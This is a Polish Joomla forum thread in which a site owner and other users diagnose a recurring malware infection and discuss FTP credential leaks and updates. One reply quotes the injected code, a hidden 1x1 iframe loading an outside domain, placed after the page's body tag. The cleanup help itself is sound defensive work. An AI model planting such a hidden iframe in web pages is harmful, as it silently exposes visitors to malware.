Zobacz pełną wersję : Walka z Exploitem na stronie
Witam!
Zarządzam stroną ala.boncol.pl (www.ala.boncol.pl), od jakiś 2 tygodni mamy exploita na stronie. Zaktualizowałem joomle do wersji 1.5.22, zmieniłem hosting na porządniejszy pozmieniane hasła do bazy na admina, itp. Chwile dobrze a po 2 dniach znowu to samo. Straciłem już cierpliwość stąd post na forum. Z góry dziękuje za pomoc i pomysły jak to zło zwalczyć.
pozdrawiam.
Majas
to nie exploit , tylko złośliwy kod, jak przeniosłeś stronę na nowy hosting ? starą stronę ? ( odnalazłeś i usunąłeś ten kod ) , a może używasz Total Commandera ( o którym było tak głośno ) ?
Wyłącz na trochę stronę i dokonaj przeglądu plików index.html i index.php czy nie ma tam niepożądanych wpisów. Z tego co widać to są.
Witam!
Dzięki za szybką odpowiedź. Indexy były podmieniane wielokrotnie na kopie z przed ataku i ciągle to paskudztwo włazi. Używam total commandera, dzięki za ostrzeżenie zaraz zmienię na innego.
pozdrawiam!
Zapomnij o TC jako kliencie ftp. Masz "łobuza" w lokalnej maszynie i TC pomaga ci go przerzucać na hosting. Wystarczy na forum poszukać wątków o TC.
Kompa mam czystego, pliki podmienione innym klientem, na razie jest dobrze. Zobaczymy jak długo. Pozdrawiam i dzięki za pomoc. A tak przy okazji może jeszcze ktoś zerknąć czy indexy są czyste?
mjmartino
10-02-2011, 12:34
Co do tego ma TC jak ktoś ma zabezpieczonego locala to czemu ma nie używać TC ? to że są robaki które potrafią uzyskać hasło z TC nie znaczy że jest on zły... Administruje pare ładnych lat i zawsze używam TC i nigdy mi się nie zdarzył tego typu atak... (robaki potrafią nie tylko z TC pozyskiwać hasła ;) )
Jak się dba to się dba kompleksowo a nie zwala wine na inne narzędzia ;)
Btw. co do rad @majas sprawdz i zaaktualizuj dodatkowo komponenty jakie używasz również jak również moduły oraz pluginy ;)
Aktualizacja bezpieczeństwa nie nie tylko sama JOOMLA!
Gdyby każdy nazywający siebie administratorem podchodził do zagadnienia świadomie i odpowiedzialnie, zwracając uwagę na aktualizacje, bezpieczeństwo itd... temat chociażby TC nie wracałby jak bumerang.
Tutaj było o tym http://forum.joomla.pl/showthread.php?26197
Zapomnij o TC jako kliencie ftp
Zupełnie się nie zgadzam. W TC przy dodawaniu nowego połączenia FTP jest taki przycisk "Szyfruj" - przyznam, że to szyfrowanie nie jest "wysokich lotów" ale nie ma możliwości aby jakiś "robal" połączył się z naszymi zapamiętanymi kontami FTP. Nie psioczyć na TC bo używam go od zawsze i jeszcze nie udało mi się zainfekować przy jego pomocy żadnego konta :)
Screenshot (http://z1.przeklej.pl/prze712/58324a2300184aef4d53da50/tc.png)
Też go używam od zawsze :) ale jak widać nie każdemu służy.
jak widać nie każdemu służy.
Ale to nie wina TC (w którym można sobie "zaszyfrować" połączenia ) a użytkownika, który nie wie, że coś takiego jest. Użytkownik zawsze jest najsłabszym ogniwem :)
No niestety to nie wina TC. Znowu avast wykrywa exploit, Moduły raczej wszystkie mam aktualne. Nie wiem co dalej. Macie jeszcze jakieś pomysły?
mjmartino
10-02-2011, 14:37
Widocznie coś Ci się dokleja dalej na <iframe> poszukaj my tego niestety nie zrobimy za ciebie To nie exploit tylko malware..
ehh REMOVE!
<body class="body_bg"><iframe src="http://zxstats.com/" width="1" height="1" frameborder="0"></iframe>
jednak zrobiłem to za Ciebie.. zrób porządek wyłącz stronę na trochę i poszukaj jak toś wyżej sugerował!
Poza tym opera mi wykryła że masz Mailware również więc możliwe że trafiłeś na jakaś czarną listę już jesli problem dość długo występuje..
Pousuwałem wszystkie możliwe indexy html a były w każdym podfolderze i w nich wspomniany wcześniej kod. Wyczyściłem index.php i jak na razie chodzi zainstalowałem jeszcze dodatkowo moduł JHackGuard może to coś pomoże.
Dzięki wszystkim za pomoc i mam nadzieje że będzie już dobrze.
pozdrawiam!
Majas:spoko:
tomaszek83
11-02-2011, 13:21
index.html mają być w każdym katalogu, z tym że mają być czyste.
Usunąłem indexy i same się porobiły nowe czyste i pasuje.
tomaszek83
11-02-2011, 13:39
a to ok.
vBulletin® v4.2.5, Prawa przedruku © 2024 vBulletin Solutions, Inc. Wszystkie prawa zastrzeżone.
Tłumaczenie: Polskie Centrum Joomla!